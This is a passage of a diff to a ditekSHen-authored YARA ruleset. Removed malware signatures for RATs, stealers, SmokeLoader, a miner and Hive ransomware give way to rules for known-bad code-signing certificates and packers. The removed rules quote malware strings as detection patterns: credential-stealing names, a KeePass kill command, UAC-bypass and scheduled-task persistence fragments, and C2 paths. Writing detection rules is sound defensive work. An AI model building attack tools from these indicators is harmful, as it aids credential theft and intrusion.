-		uint16( 0 ) == 0x5a4d and ( 3 of ( $s* ) or ( all of ( $c* ) and ( 2 of ( $s* ) or 1 of ( $m* ) or 1 of ( $p* ) ) ) or ( 1 of ( $m* ) and 1 of ( $s* ) and ( 1 of ( $c* ) or 1 of ( $p* ) ) ) )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Arctic Nights Äkäslompolo Oy" and pe.signatures [ i ] . serial == "98:4e:84:cf:e3:62:e2:78:f5:58:e2:c7:0a:aa:fa:c2" )
 }
-rule DITEKSHEN_MALWARE_Win_Dlagent14 : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_45245Eef53Fcf38169C715Cf68F44452 : FILE
 {
 	meta:
-		description = "Detects downloader injector"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "6f80567e-b89a-557d-a282-b61c0b99625e"
-		date = "2020-11-06"
-		modified = "2024-11-01"
-		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L6365-L6378"
+		id = "3e92744d-1eb8-511a-b933-6dbe1e74fcfd"
+		date = "2020-11-19"
+		modified = "2024-10-04"
+		reference = "https://bazaar.abuse.ch/faq/#cscb"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L8896-L8909"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "2806b553635dbf96e9c00d3554dd5732df64200b3ae2c4845a2675218bd56387"
+		logic_hash = "7667563aa02be9a85ba286bc16eb37380d5988b32f0ce27b1dbd9ae18b8b9175"
 		score = 75
 		quality = 75
 		tags = "FILE"
-
-	strings:
-		$s1 = "%ProgramData%\\AVG" fullword wide
-		$s2 = "%ProgramData%\\AVAST Software" fullword wide
-		$s3 = "%wS\\%wS.vbs" fullword wide
-		$s4 = "%wS\\%wS.exe" fullword wide
-		$s5 = "CL,FR,US,CY,FI,HR,HU,RO,PL,IT,PT,ES,CA,DK,AT,NL,AU,AR,NP,SE,BE,NZ,SK,GR,BG,NO,GE" ascii
-		$s6 = "= CreateObject(\"Microsoft.XMLHTTP\")" ascii
+		thumbprint = "ad7edb1b0a6a1ee3297a8825aff090030142dce8b59b9261bc57ca86666b0cbe"
+		reason = "QuakBot"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and 5 of them
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "PAPER AND CORE SUPPLIES LTD" and pe.signatures [ i ] . serial == "45:24:5e:ef:53:fc:f3:81:69:c7:15:cf:68:f4:44:52" )
 }
-rule DITEKSHEN_MALWARE_Win_Markirat : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_0406C4A1521A38C8D0C4Aa214388E4Dc : FILE
 {
 	meta:
-		description = "Detects MarkiRAT"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "6cfa276c-a64e-532a-a1ae-11a9e00867bd"
-		date = "2020-11-06"
-		modified = "2024-11-01"
-		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L6380-L6403"
+		id = "108dd1b8-110a-5680-bd96-5517392300fa"
+		date = "2020-11-19"
+		modified = "2024-10-04"
+		reference = "https://bazaar.abuse.ch/faq/#cscb"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L8911-L8924"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "17b8bcfe8d2b4c87ff8e0bddb436e18029a3b28a5ad3994fe9bef359588d9cad"
+		logic_hash = "3db3a4f424d2974b746b8290a461f777eb88e0d8c6048e6e51e561c1f91b7747"
 		score = 75
-		quality = 50
+		quality = 75
 		tags = "FILE"
-
-	strings:
-		$pdb = "\\mfcmklg.pdb" ascii
-		$s1 = "runinhome Completed" wide
-		$s2 = "ERROR find next file<br>" wide
-		$s3 = "<br><mark>Hello: %s</mark>" wide
-		$s4 = "<br><mark>CLIPBOARD[" wide
-		$s5 = "@userhome@" wide
-		$s6 = "Global\\{2194ABA1-BFFA-4e6b-8C26-D1BB20190312}" wide
-		$s7 = "taskkill /im svehost.exe /t /f" fullword ascii
-		$s8 = "taskkill /im keepass.exe /t /f" fullword ascii
-		$ba = /bitsadmin \/(addfile|cancel|SetPriority|resume)/ ascii wide
-		$c1 = "/ech/client.php?u=" wide
-		$c2 = "/up/uploadx.php?u=" wide
-		$c3 = "/ech/echo.php?req=rr&u=" wide
-		$c4 = "/ech/rite.php" wide
-		$c5 = "http://microsoft.com-view.space/i.php?u=" wide
-		$c6 = "Content-Disposition: form-data; name=\"uploadedfile\"; filename=\"" ascii
+		thumbprint = "7d6dc731d94c9aaf241f3df940ce8ca8393380b12f92e872273ae747c5d4791f"
+		reason = "IcedID"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( ( $pdb and any of them ) or ( 5 of ( $s* ) ) or ( 3 of ( $c* ) ) or ( ( #ba > 3 and 4 of them ) ) )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Venezia Design SRL" and pe.signatures [ i ] . serial == "04:06:c4:a1:52:1a:38:c8:d0:c4:aa:21:43:88:e4:dc" )
 }
-rule DITEKSHEN_MALWARE_Win_Klingonrat : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_5Ef27Fc51Ee80B30430947C9967Db440 : FILE
 {
 	meta:
-		description = "Detects KlingonRAT"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "bea50bce-b38c-50a0-902a-1014615bd9b8"
-		date = "2020-11-06"
-		modified = "2024-11-01"
-		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L6405-L6427"
+		id = "53f7b334-8feb-5581-a64c-5db6558a6434"
+		date = "2020-11-19"
+		modified = "2024-10-04"
+		reference = "https://bazaar.abuse.ch/faq/#cscb"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L8926-L8939"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "2abfbfc1b67f931f15bfdfd2cd4ba7821e62eb8c518bbc04629c0dd694bbd9c1"
+		logic_hash = "e282054102d852c0f66435148ce97050b15fb6f60f5d1bfc875b02de9c50c297"
 		score = 75
 		quality = 75
 		tags = "FILE"
-
-	strings:
-		$go = "Go build ID:" ascii
-		$s1 = "/UCRelease/src/client/uac/once/"
-		$s2 = "%T\\AppData\\Local\\Windows Update\\"
-		$s3 = "%TSoftware\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\"
-		$s4 = "wmic /namespace:'\\\\root\\subscription' PATH"
-		$s5 = "C:\\Windows\\System32\\fodhelper.exeCaption,ParentProcessId,ProcessId"
-		$s6 = "ldpro.exelsass.exeluall.exeluspt.exe"
-		$s7 = "scangui.exedeps/lsass.exeetrustcipe.exefile"
-		$s8 = "alogserv.exeaplica32.exeapvxdwin.exeatro55en.exeautodown.exeavconsol.exeavgserv9.exeavkwctl9.exeavltmain.exeavpdos32.exeavsynmgr.exeavwupd32.exeavwupsrv.exe"
-		$c1 = "%s/keyLogger?machineId=%s" ascii
-		$c2 = "%s/stealer?machineId=%s" ascii
-		$c3 = "%s/lsass?machineId=%s" ascii
-		$c4 = "%s/logger?machineId=%s" ascii
-		$c5 = "%s/machineInfo?machineId=%s" ascii
-		$c6 = "failurehttps://%s:%d/botif-modified-sinceillegal" ascii
+		thumbprint = "c2dcc4a1ea16e45f86828e81eda20f83e70cbf77e152ddd80b1b4a730ef77551"
+		reason = "RedLineStealer"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( $go ) and ( 3 of ( $c* ) or 5 of ( $s* ) or ( 3 of ( $s* ) and 1 of ( $c* ) ) )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "AMCERT,LLC" and pe.signatures [ i ] . serial == "5e:f2:7f:c5:1e:e8:0b:30:43:09:47:c9:96:7d:b4:40" )
 }
-rule DITEKSHEN_MALWARE_Win_Xfiles : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_672237253A9B7Ef9D02D7D1Cb27A3Ff4 : FILE
 {
 	meta:
-		description = "Detects X-Files infostealer (formerly BotSh1zoid)"
+		description = "No description has been set in the source file - DitekSHen"
 		author = "ditekSHen"
-		id = "3f8b2f9b-aa6a-5ffc-95b8-5e44de0d1a49"
-		date = "2020-11-06"
-		modified = "2024-11-01"
+		id = "590b3764-c4e2-59a5-b263-bc3e0d57c85a"
+		date = "2020-11-19"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L6429-L6460"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L8941-L8952"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "0c04a8f019aea36f4bba3ce8289c2d608c69d76bbf321052560b4ca2214be057"
+		logic_hash = "9b989f8d89c566980f3f7e6490f0271ab0f531fb2717b55e6f3b7ff6fadd9144"
 		score = 75
-		quality = 48
+		quality = 75
 		tags = "FILE"
-
-	strings:
-		$x1 = "\\BotSh1zoid\\" ascii
-		$x2 = "\\BuildPacker.pdb" ascii
-		$x3 = "\\Svc_host.pdb" ascii nocase
-		$s1 = "WDefender" fullword ascii
-		$s2 = "CheckDefender" fullword ascii
-		$s3 = "RunPS" fullword ascii
-		$s4 = "DownloadFile" fullword ascii
-		$v1_1 = "<Pass encoding=\"base64\">(.*)</Pass>" wide
-		$v1_2 = "Grabber\\" wide
-		$v1_3 = "/log.php" wide
-		$v1_4 = /Browsers\\(Logins|Cards|Cookies)/ wide
-		$v1_5 = "<StealSteam>b__" ascii
-		$v1_6 = "record_header_field" fullword ascii
-		$v1_7 = "JavaScreenshotiptReader" fullword ascii
-		$v1_8 = "HTTPDebuggerPro" wide
-		$v1_9 = "IEInspector" wide
-		$v1_10 = "Fiddler" wide
-		$v2_1 = /get_(Cookie|Logins|Cards)Path/ fullword ascii
-		$v2_2 = "get_AllScreens" fullword ascii
-		$v2_3 = "{0}_{1}_{2}.zip" fullword wide
-		$v2_4 = "\\Stealer" fullword wide
-		$g1 = "$983a3552-4ec3-4936-bd4a-8e6fd67b4c67" fullword ascii
-		$g2 = "$a5d9ca4d-400f-4e07-8c09-a916b548f2e3" fullword ascii
-		$g3 = "$ebc25cf6-9120-4283-b972-0e5520d0000C" fullword ascii
+		thumbprint = "36a0f423c1fa48f172e4fecd06b8099f0ebbaeb8"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( ( 1 of ( $x* ) and ( 3 of ( $s* ) or 3 of ( $v1* ) or 3 of ( $v2* ) ) ) or 7 of ( $v1* ) or 3 of ( $v2* ) or ( 2 of ( $g* ) and 3 of them ) )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Foshan Yongqiheng Trading Co., Ltd." and pe.signatures [ i ] . issuer contains "Certum Extended Validation Code Signing 2021 CA" and pe.signatures [ i ] . serial == "67:22:37:25:3a:9b:7e:f9:d0:2d:7d:1c:b2:7a:3f:f4" )
 }
-rule DITEKSHEN_MALWARE_Win_Allakore : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_708737C791C878D6Dd7B7C43 : FILE
 {
 	meta:
-		description = "Detects AllaKore"
+		description = "No description has been set in the source file - DitekSHen"
 		author = "ditekSHen"
-		id = "371663c1-6faf-5ca3-a79e-e4340d44660b"
-		date = "2020-11-06"
-		modified = "2024-11-01"
+		id = "65f3827d-25c4-59bb-8555-508c3e92ed5d"
+		date = "2020-11-19"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L6462-L6493"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L8954-L8965"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "0e93682787e27246cdddbd67ca5360728c65049a2e97e71809b5902854aa4bef"
+		logic_hash = "5e47fc7ed52e57aafc5eb2f1d56eb8296080218b65d70879bd75fd1a0ac58f66"
 		score = 75
-		quality = 73
+		quality = 75
 		tags = "FILE"
-
-	strings:
-		$x1 = "AllaKore Remote - Chat" fullword wide
-		$x2 = "AllaKore Remote - Share Files" fullword wide
-		$x3 = "CYRUS - Chat" fullword wide
-		$x4 = "CYRUS - Share Files" fullword wide
-		$x5 = "<|REDIRECT|><|GETFOLDERS|>" fullword wide
-		$x6 = "<|REDIRECT|><|DOWNLOADFILE|>" fullword wide
-		$x7 = "<|REDIRECT|><|WHEELMOUSE|>" fullword wide
-		$x8 = "<|REDIRECT|><|SETMOUSE" wide
-		$x9 = "<|CHECKIDPASSWORD|>" fullword wide
-		$x10 = "<|KEYBOARDSOCKET|>" fullword wide
-		$x11 = "<|REDIRECT|><|CLIPBOARD|>" fullword wide
-		$x12 = "<|IDEXISTS!REQUESTPASSWORD|>" fullword wide
-		$x13 = "<|GETFULLSCREENSHOT|>" fullword wide
-		$x14 = "<|MAINSOCKET|>" fullword ascii
-		$s1 = "You can not connect with yourself!" wide
-		$s2 = "Waiting for authentication..." wide
-		$s3 = "Connected support!" wide
-		$s4 = "ID does nor exists." wide
-		$s5 = "Finding the ID..." wide
-		$s6 = "PC is Busy!" wide
-		$s7 = "Upload &  Execute" fullword ascii
-		$s8 = "Download file selected" fullword ascii
-		$s9 = "CaptureKeys_TimerTimer" fullword ascii
-		$s10 = "Remote File Manager" fullword ascii
+		thumbprint = "7ed7081ee612fbf9fe0ade46f4a2749da20251e0"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( 4 of ( $x* ) or 4 of ( $s* ) or ( 3 of ( $s* ) and 2 of ( $x* ) ) )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Langfang Alkem Material Technology Co., Ltd." and pe.signatures [ i ] . issuer contains "GlobalSign GCC R45 EV CodeSigning CA 2020" and pe.signatures [ i ] . serial == "70:87:37:c7:91:c8:78:d6:dd:7b:7c:43" )
 }
-rule DITEKSHEN_MALWARE_Win_Reverserat : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_0Bc777F88Ddf5F3Ce479452F : FILE
 {
 	meta:
-		description = "Detects ReverseRAT"
+		description = "No description has been set in the source file - DitekSHen"
 		author = "ditekSHen"
-		id = "df13fc6c-025a-54db-809d-4f3c27b8aa7a"
-		date = "2020-11-06"
-		modified = "2024-11-01"
+		id = "da891fe8-fe9f-53f8-836c-161d13fd5382"
+		date = "2020-11-19"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L6495-L6514"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L8967-L8978"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "87ab00a5588bfce04ec47a07b184fffe359e472ac8bf561b02a8b070edf2e014"
+		logic_hash = "988fd5e652910f7b4388fe5bed91195261ff95d84cc7e53a389432577a114baa"
 		score = 75
 		quality = 75
 		tags = "FILE"
-
-	strings:
-		$pdb1 = "\\ReverseRat.pdb" ascii nocase
-		$pdb2 = "\\ReverseRat\\obj\\" ascii nocase
-		$s1 = "processCmd" fullword ascii
-		$s2 = "CmdOutputDataHandler" fullword ascii
-		$s3 = "sendingProcess" fullword ascii
-		$s4 = "SetStartup" fullword ascii
-		$s5 = "RunServer" fullword ascii
-		$s6 = "_OutputDataReceived" ascii
-		$s7 = { 63 00 6d 00 64 00 2e 00 65 00 78 00 65 00
-                00 03 0a 00 00 13 74 00 65 00 72 00 6d 00
-                69 00 6e 00 61 00 74 00 65 00 00 09 65 00
-                78 00 69 00 74 00 }
+		thumbprint = "55aa40dea5621f0c0fbc8b9dd8066ff2290a7e82"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( ( 1 of ( $pdb* ) and 2 of ( $s* ) ) or 5 of ( $s* ) )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "ARION LLC" and pe.signatures [ i ] . issuer contains "GlobalSign GCC R45 EV CodeSigning CA 2020" and pe.signatures [ i ] . serial == "0b:c7:77:f8:8d:df:5f:3c:e4:79:45:2f" )
 }
-rule DITEKSHEN_MALWARE_Win_Smokeloader : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_691Ed2236Cca78D180F29Dfd : FILE
 {
 	meta:
-		description = "Detects SmokeLoader variants"
+		description = "No description has been set in the source file - DitekSHen"
 		author = "ditekSHen"
-		id = "e8f28f89-3a79-5d78-8c0a-bad16a57df84"
-		date = "2020-11-06"
-		modified = "2024-11-01"
+		id = "f889f1a6-070d-505e-aaa6-0d454f52a876"
+		date = "2020-11-19"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L6516-L6539"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L8980-L8991"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "65c56ed11a3cb4e4bcf8fd2a6be097545cb96e84ba4c4202969d1d163a2a36ed"
+		logic_hash = "94e7c3aea1fca253395eae398176dc9875ca1f1c13002063b5eda8ffb4ad973f"
 		score = 75
 		quality = 75
 		tags = "FILE"
-
-	strings:
-		$x1 = "G2A/CLP/05/RYS" fullword wide
-		$x2 = "0N1Y/53R10U5/BU51N355" fullword wide
-		$x3 = "CH4PG3PB-6HT2VI9C-O2NL2NO5-QP1BW0EG" fullword wide
-		$s1 = "Azure-Update-Task" fullword wide
-		$s2 = "C:\\Windows\\System32\\schtasks.exe" fullword wide
-		$s3 = "/C /create /F /sc minute /mo 1 /tn \"" fullword wide
-		$s4 = "\\Microsoft\\Network" fullword wide
-		$s5 = "\\Microsoft\\TelemetryServices" fullword wide
-		$s6 = "\" /tr \"" fullword wide
-		$e1 = "\\sqlcmd.exe" fullword wide
-		$e2 = "\\sihost.exe" fullword wide
-		$e3 = "\\fodhelper.exe" fullword wide
+		thumbprint = "8c8a043f51bb8d59182fb268c0db2f1b9d876dbe"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( ( 1 of ( $x* ) and 4 of ( $s* ) ) or ( 5 of ( $s* ) and 1 of ( $e* ) ) )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "COSMART LLC" and pe.signatures [ i ] . issuer contains "GlobalSign GCC R45 EV CodeSigning CA 2020" and pe.signatures [ i ] . serial == "69:1e:d2:23:6c:ca:78:d1:80:f2:9d:fd" )
 }
-rule DITEKSHEN_MALWARE_Win_Dlinjector03 : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_3B0E3879266F3Bc98225B390 : FILE
 {
 	meta:
-		description = "Detects unknown loader / injector"
+		description = "No description has been set in the source file - DitekSHen"
 		author = "ditekSHen"
-		id = "2d0df2d8-5b1c-5408-b8c7-8ca14d57da0f"
-		date = "2020-11-06"
-		modified = "2024-11-01"
+		id = "0b85d4be-678a-51a1-acbc-3e7b94bec804"
+		date = "2020-11-19"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L6541-L6551"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L8993-L9004"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "10092e7916775fe0a39baa5714fdda89f443ceabdcc610cc1fcd5a0fb0e68d0c"
+		logic_hash = "2d480534c046e38fe90ee01dc0fa9abf1ade15f879c3770f3df54c6e2c2e1552"
 		score = 75
-		quality = 73
+		quality = 75
 		tags = "FILE"
-
-	strings:
-		$x1 = "LOADER ERROR" fullword ascii
-		$s1 = "_ZN6curlpp10OptionBaseC2E10CURLoption" fullword ascii
-		$s2 = "The procedure entry point %s could not be located in the dynamic link library %s" fullword ascii
+		thumbprint = "2eab64a4eaf37060d27620a822df2e1f18ac28f6"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and all of them
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Hangzhou Yueju Apparel Co., Ltd." and pe.signatures [ i ] . issuer contains "GlobalSign GCC R45 EV CodeSigning CA 2020" and pe.signatures [ i ] . serial == "3b:0e:38:79:26:6f:3b:c9:82:25:b3:90" )
 }
-rule DITEKSHEN_MALWARE_Win_Coinminer02 : FILE
+rule DITEKSHEN_INDICATOR_JAVA_Packed_Allatori
 {
 	meta:
-		description = "Detects coinmining malware"
+		description = "Detects files packed with Allatori Java Obfuscator"
 		author = "ditekSHen"
-		id = "1878a1b5-4e97-5575-802e-573caded2b3a"
+		id = "16b9f455-ba73-5f09-9822-8349c53fa965"
 		date = "2020-11-06"
-		modified = "2024-11-01"
+		modified = "2023-08-29"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L6553-L6571"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_packed.yar#L113-L121"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "83760aef667819923a2ac67c006e03bb6d4260b7a4aedd691dd5b145fb50d5c1"
+		logic_hash = "ac48a573eb9d9fffe38d09993ff062f308edb07b8a7498e332cc3eb501d48db7"
 		score = 75
 		quality = 75
-		tags = "FILE"
+		tags = ""
+		importance = 20
 
 	strings:
-		$s1 = "%s/%s (Windows NT %lu.%lu" fullword ascii
-		$s2 = "\\Microsoft\\Libs\\WR64.sys" wide
-		$s3 = "\\\\.\\WinRing0_" wide
-		$s4 = "pool_wallet" ascii
-		$s5 = "cryptonight" ascii
-		$s6 = "mining.submit" ascii
-		$c1 = "stratum+ssl://" ascii
-		$c2 = "daemon+http://" ascii
-		$c3 = "stratum+tcp://" ascii
-		$c4 = "socks5://" ascii
-		$c5 = "losedaemon+https://" ascii
+		$s1 = "# Obfuscation by Allatori Obfuscator" ascii wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( 3 of ( $s* ) and 1 of ( $c* ) )
+		all of them
 }
-rule DITEKSHEN_MALWARE_Win_Mercurial : FILE
+rule DITEKSHEN_INDICATOR_EXE_Python_Byte_Compiled : FILE
 {
 	meta:
-		description = "Detects Mercurial infostealer"
+		description = "Detects python-byte compiled executables"
 		author = "ditekSHen"
-		id = "c262ada2-01ca-5fc1-adef-987908514019"
+		id = "04ae604c-6176-54cf-98e9-4386e52420f8"
 		date = "2020-11-06"
-		modified = "2024-11-01"
+		modified = "2023-08-29"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L6573-L6593"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_packed.yar#L211-L220"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "400f8f717a4e07bf4de508c02bbcd9e82bf21f3df84c989fc622378f33e192f0"
+		logic_hash = "212d525509a4d8fb7f1b5efa929526c8758549bfdb8591c88ce602315e6b3147"
 		score = 75
-		quality = 50
+		quality = 75
 		tags = "FILE"
+		importance = 20
 
 	strings:
-		$x1 = "mercurial grabber" wide nocase
-		$x2 = "\"text\":\"Mercurial Grabber |" wide
-		$x3 = "/nightfallgt/mercurial-grabber" wide
-		$s1 = "/LimerBoy/Adamantium-Thief/" ascii
-		$s2 = "Mozilla/5.0 (Macintosh; Intel Mac OS X x.y; rv:42.0) Gecko/20100101 Firefox/42.0" fullword wide
-		$s3 = "StealCookies" fullword ascii
-		$s4 = "StealPasswords" fullword ascii
-		$s5 = "DetectDebug" fullword ascii
-		$s6 = "CaptureScreen" fullword ascii
-		$s7 = "WebhookContent" fullword ascii
-		$s8 = /Grab(Token|Product|IP|Hardware)/ fullword ascii
-		$p1 = "[\\w-]{24}\\.[\\w-]{6}\\.[\\w-]{27}" fullword ascii wide
-		$p2 = "mfa\\.[\\w-]{84}" fullword ascii wide
+		$s1 = "b64decode" ascii
+		$s2 = "decompress" ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( 1 of ( $x* ) or 5 of ( $s* ) or ( all of ( $p* ) and 3 of ( $s* ) ) )
+		uint32( 0 ) == 0x0a0df303 and filesize < 5KB and all of them
 }
-rule DITEKSHEN_MALWARE_Win_Phonzy : FILE
+rule DITEKSHEN_INDICATOR_MSI_EXE2MSI : FILE
 {
 	meta:
-		description = "Detects specific downloader agent"
+		description = "Detects executables converted to .MSI packages using a free online converter."
 		author = "ditekSHen"
-		id = "d35f41e4-4633-5482-9ae4-79354463f1b9"
+		id = "039df7b6-e4bf-5537-ae5b-f2168044e77e"
 		date = "2020-11-06"
-		modified = "2024-11-01"
+		modified = "2023-08-29"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L6595-L6608"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_packed.yar#L222-L233"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "924e7674d76594314df1a32d38f19cee12a3ed49cdf5e153f98bb08a7634055c"
+		logic_hash = "afd48b54766600805ae1aeef13b11de4ca160ea1f96419a4090ab9dae55fa4cd"
 		score = 75
 		quality = 75
 		tags = "FILE"
+		snort2_sid = "930061-930063"
+		snort3_sid = "930022"
+		importance = 20
 
 	strings:
-		$ua1 = "User-Agent: Mozilla/5.0 (X11; Linux" wide
-		$s1 = "<meta name=\"keywords\" content=\"([\\w\\d ]*)\">" fullword wide
-		$s2 = "WebClient" fullword ascii
-		$s3 = "WriteAllText" fullword ascii
-		$s4 = "DownloadString" fullword ascii
-		$s5 = "WriteByte" fullword ascii
+		$winin = "Windows Installer" ascii
+		$title = "Exe to msi converter free" ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( all of ( $s* ) or ( 1 of ( $ua* ) and ( $s1 ) and 2 of ( $s* ) ) )
+		uint32( 0 ) == 0xe011cfd0 and ( $winin and $title )
 }
-rule DITEKSHEN_MALWARE_Win_Hive : FILE
+rule DITEKSHEN_INDICATOR_PY_Packed_Pyminifier : FILE
 {
 	meta:
-		description = "Detects Hive ransomware"
+		description = "Detects python code potentially obfuscated using PyMinifier"
 		author = "ditekSHen"
-		id = "7b79dc54-01c7-5667-acf5-a32cd7a45b54"
+		id = "a111c116-a2b3-5689-8d44-221adf37e932"
 		date = "2020-11-06"
-		modified = "2024-11-01"
+		modified = "2023-08-29"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L6610-L6647"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_packed.yar#L331-L339"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "14c20ff2fa62d80eed0f4f364e24d93d493d4f3b47f664983714940afa74046f"
+		logic_hash = "c7e916906d4654215de6d12e1bff790f24bcf69e97a7e5314a2a057a91b135a3"
 		score = 75
-		quality = 73
+		quality = 75
 		tags = "FILE"
+		importance = 20
 
 	strings:
-		$url1 = "http://hivecust" ascii
